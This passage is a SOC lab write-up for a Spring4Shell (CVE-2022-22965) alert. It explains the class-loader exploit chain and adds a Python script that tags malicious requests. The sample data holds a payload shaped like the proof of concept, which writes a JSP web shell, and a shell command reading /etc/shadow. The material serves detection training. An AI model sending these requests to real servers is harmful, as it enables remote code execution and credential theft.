Diamond Model of Intrusion Analysis in Practice
May 30, 2022
LetsDefend: SOC171-Spring4Shell
Log Analysis
Spring4Shell (CVE-2022-22965) is a remote code execution (RCE) vulnerability in the Spring Framework. It was exploited as a 0-day before a patch was available. According to public information, the exploit abuses Spring's request data binding to reach Tomcat's class loader through the "class.module.classLoader" property path and reconfigure the access-log valve so that it writes attacker-controlled content as a file into the web root. That is the "arbitrary file upload" capability the alert refers to: in the public proof of concept the uploaded file is a JSP web shell, which then gives command execution. Note that the affected setup is specific (Spring MVC/WebFlux on JDK 9 or later, deployed as a WAR on Tomcat), so a matching request pattern does not by itself prove the target was vulnerable.
Suspicious parameters and detection rules triggered:
- /tomcatwar.jsp?pwd=j&cmd=cat%20/etc/shadow (a request to an already dropped JSP web shell: pwd=j satisfies the shell's password check and cmd carries the command to run, here reading /etc/shadow)
- java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di in the POST data (URL-decoded: "java.io.InputStream in = %{c1}i", a fragment of the web shell source injected through the Tomcat access-log pattern; %{c1}i is access-log syntax for "value of request header c1", which is how the exploit smuggles in characters the pattern would otherwise mangle)
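To make the two indicators above usable beyond eyeballing a single alert, here is an added detection example (not part of the original write-up and not a LetsDefend rule) that URL-decodes the query string and POST body of each request and tags it with the Spring4Shell stage it matches: the data-binding attempt on the class loader, the injected web shell source, or a command sent to the dropped shell. The request records are constructed samples shaped like the public proof of concept; the field layout (method, URI, body) and the tag names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicator 1: the Spring data-binding path the public Spring4Shell exploit
# uses to reach Tomcat's AccessLogValve through the ClassLoader.
BINDING_PATH = "class.module.classLoader"

# Indicator 2: fragments of the JSP web shell that the exploit smuggles in via
# the access-log pattern. "%{c1}i" is AccessLogValve syntax for "value of the
# request header c1"; the shell source is assembled from such references.
WEBSHELL_SOURCE = re.compile(r"java\.io\.InputStream|%\{c\d\}i|\.exec\(", re.I)

# Indicator 3: post-exploitation use of the dropped shell, e.g.
# /tomcatwar.jsp?pwd=j&cmd=...  (a .jsp path carrying both pwd and cmd).
WEBSHELL_USE = re.compile(r"\.jsp$", re.I)

# Constructed sample records (assumed layout: method, request URI, POST body).
# The POST body mirrors the shape of the public proof of concept; it is a
# sample for testing the rules, not traffic from the original alert.
SAMPLE_REQUESTS = [
    ("GET", "/tomcatwar.jsp?pwd=j&cmd=cat%20/etc/shadow", ""),
    (
        "POST",
        "/app/index",
        "class.module.classLoader.resources.context.parent.pipeline.first.pattern="
        "%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20"
        "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec("
        "request.getParameter(%22cmd%22)).getInputStream()%3B%20%7D"
        "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
        "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
        "&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar",
    ),
    ("GET", "/index.html", ""),
]


def decode_value(encoded):
    """Percent-decode one value the way an analyst would before reading it."""
    return unquote_plus(encoded)


def classify(method, uri, body=""):
    """Return the list of Spring4Shell indicator tags matched by one request.

    Parameters from both the query string and the POST body are decoded first,
    so the rules run on what the application would actually see.
    """
    parts = urlsplit(uri)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if body:
        params += parse_qsl(body, keep_blank_values=True)
    names = {name for name, _ in params}
    values = " ".join(value for _, value in params)

    hits = []
    if any(name.startswith(BINDING_PATH) for name in names):
        hits.append("classloader-binding")
    if WEBSHELL_SOURCE.search(values):
        hits.append("webshell-source")
    if WEBSHELL_USE.search(parts.path) and {"pwd", "cmd"} <= names:
        hits.append("webshell-command")
    return hits


def scan(records):
    """Run classify() over (method, uri, body) records; keep only the flagged ones."""
    flagged = []
    for method, uri, body in records:
        hits = classify(method, uri, body)
        if hits:
            flagged.append((uri, hits))
    return flagged


if __name__ == "__main__":
    for uri, hits in scan(SAMPLE_REQUESTS):
        print(f"{uri} -> {', '.join(hits)}")
```

The strongest single signal is the "class.module.classLoader" parameter prefix: legitimate form binding has no reason to set it, so it is worth alerting on by itself regardless of what the value contains. The web shell source and command rules are more fragile (a different shell name, password or header names would evade them), so treat them as confirmation of a successful drop rather than as the primary detection, and pair any hit with a check for a newly created .jsp file under the Tomcat web root.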
An attacker has conducted port scanning and then tried to exploit the service on port 8082 with the “Spring4Shell” vulnerability. Assuming the attack…